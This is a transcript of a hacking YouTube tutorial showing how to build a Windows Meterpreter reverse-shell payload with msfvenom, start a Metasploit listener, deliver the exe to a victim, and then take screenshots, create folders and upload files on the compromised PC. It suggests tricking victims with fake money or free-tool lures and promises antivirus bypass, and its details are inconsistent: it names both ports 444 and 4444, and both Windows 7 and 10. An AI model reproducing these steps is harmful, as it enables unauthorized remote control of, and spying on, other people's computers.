Hello friends and welcome back again to VR Hackers YouTube channel. I am JS Raipa, and today in this video tutorial I am going to show you how to exploit or how to hack any Windows PC using Kali Linux operating system. So without any further delay, let's get started. So double click on your terminal in Kali Linux. Now give a command called msf venom space -p space Windows / meter preter -p we use for payload. Okay guys, so msf venom space -p space Windows / meter preter / reverse underscore tcp space lhost equal to the IP address of your Kali Linux operating system. So just click on your terminal and click on new window and give a command called ifconfig for knowing your IP address. So this is my IP address. It's different in every person's case, so just copy your IP address and paste here. So many of you thinking about IP address, what is IP address? So don't worry guys, I will make a separate series on IP address, what is IP addresses, how it works, because I think it's a very important topic for being a hacker or ethical hacker. IP address is very important topic, so I will make a separate series on it. Now give a port L port equal to 4444. I'm just assigning 444. You can use another port, it depends on you which port you want to listen the victim PC. Now give -f we use for format, so I am making for exe format virus. Now -a for architecture, so I'm just using 32-bit architecture, so x into 86, because 32-bit architecture is something which is compatible with 64-bit and also for 32-bit, so it work on both operating systems, so it is nice. Now angular brackets and give the name of your virus. I'm just giving I love you, or your payload I love you.exe, so it is my payload name. Now press enter and now it's going to make your payload. So another thing I want to share with you guys, I'm just doing this hack inside my LAN. I'm not hacking any computer outside my LAN or in the internet. The reason behind doing this thing inside my LAN, because it's only for educational purpose and I'm just making these videos for beginners, but I am definitely make a video on how to hack outside the LAN where we use port forwarding, which is a different concept. So I will make a video on it I will make a video on how to hack outside the LAN in a future for. Okay guys, so I hope you understand. So go to your files and click on it and you will be see something inside your root folder, I love you.exe. this is the virus of my file. Okay guys, now what you should need to do, give a command called msf console. So open your Metasploit console. So it takes little bit time. Now my Metasploit console is opening. So it's, you are seeing the cool banner of Metasploit. Wake up new, the matrix has you, follow the white rabbit. Yeah, just it's awesome. Sorry. So you can change also the banners. Now you need to give a command called use space exploit / multi / handler. I will make a whole series on Metasploit, so don't worry guys. So now press enter and then give a command called set payload Windows / meter preter / reverse underscore tcp and press enter. Now set lhost, the same IP address, so just paste here again. So press enter. Now set lport 444 and press enter. Now give a command called exploit. Now what you need to be do, now your Kali Linux operating system is starting the listening through TCP handler on the port 444 using the IP address 192.168.139.129. So now I need to send this payload to my victim's computer. So there is a lots of way to send payload into the any person's computer, you can mail it, or you can spoof the addresses, or there is a lots of way, guys. You can send it through the links. You can say that this is the application, if you install in your computer you will be get money, or you will be get free tunes, or this is the kind of free tool, anything, whatever you want to say. So there is a lots of ways. So use your own brain and your creativity, because in a hacking, I believe your evil brain and your evil creativity matters a lot for hacking something or doing something. So but this time I'm just doing this in a LAN, so I have a physical access of that specific computer. So what am I going to do? I'm just copying this payload inside my pen drive. So this is my pen drive, and I'm going into the files, and this is my payload. So I'm just copying this payload inside my pen drive, and because I am hacking the Windows 7 operating system, which is totally vulnerable. The thing is that sometimes we try to hack any PC or computer, but the PCs and computers block our requests, like through the firewalls, or through the Windows Defender. They block our virus or Trojan. They show us as a unwanted file, but there is a lots of way through you can bypass the firewalls and antivirus softwares. So I will be tell you in a different video, but for this time I'm just doing this in a Windows 10 operating system, which is totally vulnerable from this. Okay guys, so now I am in my Windows 7 operating system, and I just connecting my pen drive here. So I just connected my pen drive, the both systems in the same network. Okay guys, keep this thing in your brain. So I just connected my pen drive, so I just pasted this payload here. Now I just clicked on that specific payload inside my Windows 7 operating system. So now let's get back into our Kali Linux operating system. So you are guys seeing that we get a Meterpreter session. So we are now inside that our victim's computer. Let's give a command called ls. So that is the file inside of that his system, and I will show you something. So let's see the directory which we are working on. So pwd command show the current working directory. So I am inside the computer of that specific person, and let me show you another commands. You can type help, or so you can get all these commands related to that specific computers. You can dump the hashes of inside of this computer. I will make on separate video on hashes, so I will be show you something. So let's see the informations of that computer. So give a command called sysinfo, so you will be get the all details. This computer is name is lab PC, which is running on Windows 7 and using the 64 architecture, and currently the 2 user logged on it. Let's take some screenshot of his computers. Okay guys, but okay, just let's try to take a screenshot. SCREEN screenshot. So this is a screenshot saved into my computer, so I will be going to show you. The name is in a root directory, BZE and something like that. BZE, where is BZE? So this is the picture. So we take the screenshot of that person's specific computer. So let me show you some other cool stuff. So let's make some directories inside of his computer. So I'm just giving command called mkdir. It's used for making directory, like you have been hacked. So I'm just making directory inside of his computer, so I'm just showing you. So there is a directory called you have been hacked. You can also upload any file if you have, like just try to upload some files inside of his computer. So just give a command called upload. Yeah, I have a application called abc.apk. So let's upload this application, abc.apk. Press enter. So this application is uploaded into his computer. So I hope you guys enjoyed this video, and I hope that it will help you a lot about hacking and how to hack PCs and other things. So thank you so much guys for watching this video, and keep support VR Hackers.